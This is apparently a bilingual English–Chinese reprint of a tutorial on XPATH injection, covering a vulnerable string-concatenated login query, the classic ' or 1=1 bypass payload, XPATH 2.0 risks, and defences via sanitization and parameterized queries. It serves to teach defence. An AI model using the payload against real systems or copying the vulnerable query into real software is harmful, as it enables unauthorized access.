xml数据导入数据库
Code injection is a vulnerability with many faces: from SQL injection to OS command injection. These attacks happen because of a common programming mistake: letting user input pollute executable code.
代码注入是一个多方面的漏洞:从SQL注入到OS命令注入。 这些攻击的发生是由于常见的编程错误:让用户输入污染可执行代码。
Today, let’s talk about a lesser-known type of code injection: injecting into XPATH queries.
今天,让我们讨论一种鲜为人知的代码注入类型:注入XPATH查询。
XPATH is a query language used for XML documents. Think SQL for XML.
XPATH是用于XML文档的查询语言。 考虑将SQL用于XML。
XPATH provides the ability to navigate around the XML document tree, and select specific elements based on certain criteria.
XPATH提供了在XML文档树中导航以及根据特定条件选择特定元素的能力。
For example, given an XML document:
例如,给定一个XML文档:
<?xml version="1.0" encoding="utf-8"?><Employees><employee id="1"> <name>Kacey</name></employee><employee id="2"> <name>Aaron</name></employee></Employees>The XPATH expression below will select the ids of all employees:
下面的XPATH表达式将选择所有员工的ID:
/Employees/employee/@idWhile this XPATH expression will select the names of all employees:
尽管此XPATH表达式将选择所有雇员的姓名:
/Employees/employee/name/text()As you can see, XPATH is very similar to SQL in terms of functionality, albeit with a slightly different syntax. The basic syntax of XPATH is kind of like navigating the XML document using a file path.
如您所见,尽管语法略有不同,但XPATH在功能上与SQL非常相似。 XPATH的基本语法有点像使用文件路径浏览XML文档。
One major difference between XPATH and SQL is that XPATH is a standard language, and is not implementation-dependent. Whereas SQL has many different SQL dialects like MySQL, MSSQL, PostgreSQL, and SQLite. This difference is significant because it means that exploiting XPATH injection vulnerability is easier and potentially more scalable than exploiting SQL injection vulnerabilities because attackers won’t have to customize their payloads according to the dialect.
XPATH与SQL之间的主要区别在于XPATH是一种标准语言,并且与实现无关。 SQL具有许多不同SQL方言,例如MySQL,MSSQL,PostgreSQL和SQLite。 这种差异非常重要,因为这意味着利用XPATH注入漏洞比利用SQL注入漏洞更容易,并且可能更具扩展性,因为攻击者不必根据方言自定义其有效负载。
XPATH can be used to query and perform operations on data stored in XML documents. For example, XPATH can be used to retrieve salary information of employees stored in an XML document, and can also be used to perform numeric operations or comparisons on that data.
XPATH可用于查询和执行XML文档中存储的数据的操作。 例如,XPATH可用于检索存储在XML文档中的员工的薪水信息,也可用于对该数据执行数字运算或比较。
XML documents are used as databases for their portability, and their flexible and compatible structure.
XML文档由于其可移植性以及其灵活和兼容的结构而被用作数据库。
From a security point of view, it is important to note that in real-life applications, user data is seldom stored in XML documents. But communicating sensitive data across systems and web services is often done using XML. So these places are more often vulnerable.
从安全角度来看,必须注意,在现实生活中的应用程序中,用户数据很少存储在XML文档中。 但是,通常使用XML在系统和Web服务之间传递敏感数据。 因此,这些地方更容易受到伤害。
XPATH injection is an attack that injects into XPATH expressions in order to alter the outcome of the query. Similar to SQL injection, it can be used to bypass business logic, escalate user privilege, and leak sensitive data.
XPATH注入是一种注入XPATH表达式以更改查询结果的攻击。 与SQL注入类似,它可用于绕过业务逻辑,提升用户权限和泄漏敏感数据。
XPATH injection flaws occur when developers form dynamic XPATH queries using user input. Let’s say we’re working with an XML document like this: (Notice that Kacey is an admin while Aaron is not.)
当开发人员使用用户输入形成动态XPATH查询时,就会出现XPATH注入缺陷。 假设我们正在使用这样的XML文档:(请注意,Kacey是管理员,而Aaron不是。)
<?xml version="1.0" encoding="utf-8"?><Employees><employee id="1"> <name>Kacey</name> <username>kacey1</username> <password>s3cret</password><admin>1</admin></employee><employee id="2"> <name>Aaron</name> <password>p4ssw0rd</password> <admin>0</admin> </employee></Employees>A piece of code like this is vulnerable, as it concatenates user input into an XPATH expression to authenticate users.
这样的一段代码很容易受到攻击,因为它将用户输入连接到XPATH表达式中以对用户进行身份验证。
Employees.SelectNodes("//employee [@username='" + USERINPUT.username + "' and @password='" + USERINPUT.password + "']")During authentication, all is well if the user does not attempt anything funky and simply provides their username and password:
在身份验证期间,如果用户不尝试任何时髦的操作,仅提供他们的用户名和密码,一切都会很好:
Employees.SelectNodes("//employee [@username='aaron1' and @password='p4ssw0rd']")But if the user is malicious and attempts to alter the logic of the query by providing the username ‘ or 1=1 or ‘’=’ to mess with the XPATH processor:
但是,如果用户是恶意用户,并尝试通过提供用户名'或1 = 1或'='来改变XPATH处理器来更改查询逻辑:
Employees.SelectNodes("//employee [@username='' or 1=1 or ''=''and @password='any password']")Since 1=1 is always true, the query would simply select the first employee in the document tree, in this case, Kacey. And because Kacey has admin privileges on the application, the attacker gains admin privileges as well.
由于1 = 1始终为true,因此查询将只选择文档树中的第一个雇员,在这种情况下为Kacey 。 并且由于Kacey对应用程序具有管理员特权,因此攻击者也将获得管理员特权。
XPATH injection has very serious implications, just like SQL injection. But there is one key difference between SQL and XPATH that potentially make XPATH injection even more dangerous.
就像SQL注入一样,XPATH注入具有非常严重的意义。 但是SQL和XPATH之间的一个关键区别可能使XPATH注入更加危险。
SQL databases are often protected by user-based access controls: the user might be limited to certain tables, columns, and queries based on the rights of the database user that the application runs on. Whereas within a single XML document, there is no concept of access control, and XML databases have no concept of users or permissions. This means that a single XPATH injection flaw often leads to the compromise of the entire XML database.
SQL数据库通常受到基于用户的访问控制的保护:根据应用程序运行所在的数据库用户的权限,用户可能仅限于某些表,列和查询。 在单个XML文档中,没有访问控制的概念,并且XML数据库没有用户或权限的概念。 这意味着单个XPATH注入漏洞通常会导致整个XML数据库的受损。
The basics of XPATH injection applies to both XPATH 1.0 and XPATH 2.0. However, XPATH 2.0 expands the capabilities of XPATH 1.0, making XPATH injection vulnerabilities even more dangerous.
XPATH注入的基础知识适用于XPATH 1.0和XPATH 2.0。 但是,XPATH 2.0扩展了XPATH 1.0的功能,使XPATH注入漏洞更加危险。
XPATH 2.0 is much more feature-rich compared to its older version. For security purposes, two features stand out in their exploitation potential.
与旧版本相比,XPATH 2.0具有更多的功能。 为了安全起见,两个功能在其开发潜力中脱颖而出。
First, XPATH 2.0 allows users to reference documents by URL. This means the target of exploitation is no longer limited to the current document, and attackers can try to retrieve an XML document whose location on the host is known and accessible to the current server.
首先,XPATH 2.0允许用户通过URL引用文档。 这意味着利用的目标不再局限于当前文档,并且攻击者可以尝试检索XML文档,该XML文档在主机上的位置是当前服务器已知并可以访问的。
XPATH 2.0 also has a function that converts a string to a sequence of unicode numbers that represents that string. This simplifies the extraction of string data during exploitation.
XPATH 2.0还具有将字符串转换为表示该字符串的Unicode数字序列的功能。 这简化了在开发过程中字符串数据的提取。
There are two ways that an application can protect against XPATH injection attacks: input sanitization and parameterized queries.
应用程序可以通过两种方式防御XPATH注入攻击:输入清理和参数化查询。
Applications can sanitize user input before inserting the input into an XPATH query to prevent XPATH injection attacks. For example, single and double quote characters should be disallowed or escaped to prevent user input from breaking out of the query string.
在将输入插入XPATH查询之前,应用程序可以清除用户输入,以防止XPATH注入攻击。 例如,单引号和双引号字符应被禁止或转义,以防止用户输入超出查询字符串。
A better way to prevent XPATH injections is with parameterized queries: instead of building XPATH queries dynamically from user input, use parameters to insert user input into the query instead.
防止XPATH注入的更好方法是使用参数化查询:与其从用户输入动态构建XPATH查询,不如使用参数将用户输入插入查询中。
So instead of using:
因此,不要使用:
Employees.SelectNodes("//employee [@username='" + USERINPUT.username + "' and @password='" + USERINPUT.password + "']")Use this instead:
使用此代替:
Employees.SelectNodes("//employee [@username= $username and @password= $password]")This is a much safer way since input sanitation can sometimes be bypassed by using obscure characters, and its often difficult for developers to account for all the possible bypasses.
这是一种更安全的方法,因为有时可以使用晦涩的字符来绕过输入卫生,并且开发人员通常难以考虑所有可能的绕过情况。
XPATH injection, like SQL injection, is a very devastating vulnerability. But just like SQL injection, there are clear cut ways to prevent them from happening. As a developer, be sure to used parameterized queries in your XPATH expressions! And for pentesters, look out for where XML data is queried and test for possible XPATH injection vulnerabilities.
像SQL注入一样,XPATH注入是一个非常破坏性的漏洞。 但是,就像SQL注入一样,有明确的方法可以防止它们发生。 作为开发人员,请确保在XPATH表达式中使用参数化查询! 对于渗透测试人员,请注意在哪里查询XML数据,并测试可能的XPATH注入漏洞。
Hope you enjoyed learning about XPATH injection attacks. Thanks for reading.
希望您喜欢有关XPATH注入攻击的学习。 谢谢阅读。
翻译自: https://medium.com/swlh/hacking-xml-data-a64c870b0988
xml数据导入数据库
